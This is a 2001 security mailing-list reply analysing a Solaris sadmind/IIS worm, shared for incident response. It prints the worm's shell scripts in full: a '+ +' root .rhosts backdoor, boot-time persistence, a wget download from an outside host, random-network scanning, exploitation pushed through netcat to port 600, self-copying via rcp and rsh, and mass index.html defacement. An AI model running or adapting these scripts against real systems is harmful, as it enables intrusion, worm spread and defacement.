Security Incidents mailing list archives
Re: httpd and sunrpc probes from 'sunos 5.6' machines
From: Martin Markgraf <mm () RIEN-AG DE>
Date: Tue, 8 May 2001 12:36:57 +0200
Hello, Brad Doctor wrote:
I've also seen much of the same -- I submitted this to the list over the weekend, but it apparently never made it there. Basically, there is a worm process much like Lion, etc. that after compromising the machine, starts generating IP addresses and going after more. The exploit that is being used is some sort of sadmin exploit. A tell-tale sign is a root shell open on port 600 (not functional however). The exploit places it's contents in /dev/cuc and goes to town with a perl script and a random number generator. It also creates a wide-open .rhosts for root. It also starts an inetd process with /tmp/.x that has one service, the root shell bound to it, just like the lion stuff did ala "sh -i", however this shell has no IO capabilities on Solaris, and is thus useless. So, much like the other worms, this one trudges on blindly after cracking a machine that was wide-open to begin with. I think the same group wrote this one as well due to it's similarities in execution and methodology. It is executing Unicode attacks, with static HTML in the perl script, typical anti US stuff.
In the last five days or so I have seen about 9 scans for port 111 on a single machine. Scanning back these hosts has shown that 8 of them are running under solaris 5.6 and have an open port 600. The root shell on the machines I have seen was functional if you connect to them with a program like netcat instead of telnet since a simple "sh -i" does not set appropriate environment. The worm itself uses port 600 initial to create a "+ +" .rhosts file in the root home directory of a new hacked box and than copy itself via rcp as /tmp/uni.tar to these box. There ist the filelist of the /tmp/uni.tar that I have found: drwxr-xr-x 0/1 0 Apr 29 12:55 2001 /dev/cuc/ -rwxr-xr-x 0/1 6556 Apr 26 08:07 2001 /dev/cuc/brute -rw-r--r-- 0/1 86 Apr 26 09:13 2001 /dev/cuc/cmd1.txt -rw-r--r-- 0/1 655 Apr 29 12:17 2001 /dev/cuc/cmd2.txt -rwxr-xr-x 0/1 11828 Apr 25 15:27 2001 /dev/cuc/grabbb -rw-r--r-- 0/1 151 Apr 26 09:13 2001 /dev/cuc/ranip.pl -rwxr-xr-x 0/1 1591 Apr 27 06:38 2001 /dev/cuc/sadmin.sh -rwxr-xr-x 0/1 14644 Apr 25 15:27 2001 /dev/cuc/sadmindex-sparc -rwxr-xr-x 0/1 217 Apr 26 09:59 2001 /dev/cuc/start.sh -rwxr-xr-x 0/1 566 Apr 27 03:45 2001 /dev/cuc/time.sh -rw-r--r-- 0/1 67798 Apr 26 09:13 2001 /dev/cuc/uniattack.pl -rwxr-xr-x 0/1 645 Apr 26 09:13 2001 /dev/cuc/uniattack.sh -rwxr-xr-x 0/1 28620 Apr 26 08:30 2001 /dev/cuc/nc -rw-r--r-- 0/1 413 Apr 26 11:16 2001 /dev/cuc/index.html -rwxr-xr-x 0/1 136248 Apr 29 09:20 2001 /dev/cuc/wget And these are the shell scripts: cat cmd1.txt ------------ /bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts exit cat cmd2.txt ------------ /bin/tar -xvf /tmp/uni.tar /bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1 /bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1 /bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2 /bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc /bin/chmod 744 /etc/rc2.d/S71rpc /dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz /dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz /bin/mkdir /usr/local /bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local /bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local exit cat start.sh ------------ #!/bin/sh if [ ! -d /dev/cub ]; then /bin/mkdir /dev/cub fi /bin/nohup /dev/cuc/time.sh & i=1 while [ $i -lt 5 ] do /bin/nohup /dev/cuc/sadmin.sh & /bin/nohup /dev/cuc/uniattack.sh & i=`/bin/echo "$i+1"|/bin/bc` done cat time.sh ----------- #!/bin/sh /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1 while true do /bin/sleep 300 /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2 /bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3 process=`/bin/awk '{print $2}' /dev/cub/tmp2` for p in $process;do /bin/grep $p /dev/cub/tmp3 if [ $? = 0 ];then /bin/kill -9 $p fi done /bin/cp /dev/cub/tmp2 /dev/cub/tmp1 i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l` if [ $i -gt 2000 ];then /bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; & /bin/rm -f /dev/cub/result.txt fi done cat sadmin.sh ------------- #!/bin/sh while true do i=`/usr/local/bin/perl /dev/cuc/ranip.pl` j=0 while [ $j -lt 256 ];do /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt j=`/bin/echo "$j+1"|/bin/bc` done iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt` for ip in $iplist;do /bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt /bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1 if [ $? = 0 ];then /dev/cuc/brute 3 $ip >/dev/null 2>&1 if [ $? = 0 ];then /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1 /bin/tar -cvf /tmp/uni.tar /dev/cuc /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1 if [ $? = 0 ];then /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1 /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 & /bin/echo $ip >> /dev/cub/sadminhack.txt /bin/rm -f /tmp/uni.tar fi else /dev/cuc/brute 4 $ip >/dev/null 2>&1 if [ $? = 0 ];then /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1 /bin/tar -cvf /tmp/uni.tar /dev/cuc /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1 if [ $? = 0 ];then /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1 /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 & /bin/echo $ip >> /dev/cub/sadminhack.txt /bin/rm -f /tmp/uni.tar fi fi fi fi /bin/rm -f /dev/cub/$i.rpc.txt done /bin/rm -f /dev/cub/$i.txt done cat uniattack.sh ---------------- #!/bin/sh while true do i=`/usr/local/bin/perl /dev/cuc/ranip.pl` j=0 while [ $j -lt 256 ];do /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt j=`/bin/echo "$j+1"|/bin/bc` done iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt` for ip in $iplist;do /usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt done rm -f /dev/cub/$i.txt regards, Martin -- Martin Markgraf Rien Informationssysteme AG fon: +49 2841 9083061 Eurotec-Ring 15 fax: +49 2841 9083069 D-47445 Moers http://www.rien-ag.de mm () rien-ag de
Current thread:
- httpd and sunrpc probes from 'sunos 5.6' machines Hannu Liljemark (May 07)
- Re: httpd and sunrpc probes from 'sunos 5.6' machines Brad Doctor (May 07)
- Re: httpd and sunrpc probes from 'sunos 5.6' machines Martin Markgraf (May 10)
- Re: httpd and sunrpc probes from 'sunos 5.6' machines Brad Doctor (May 07)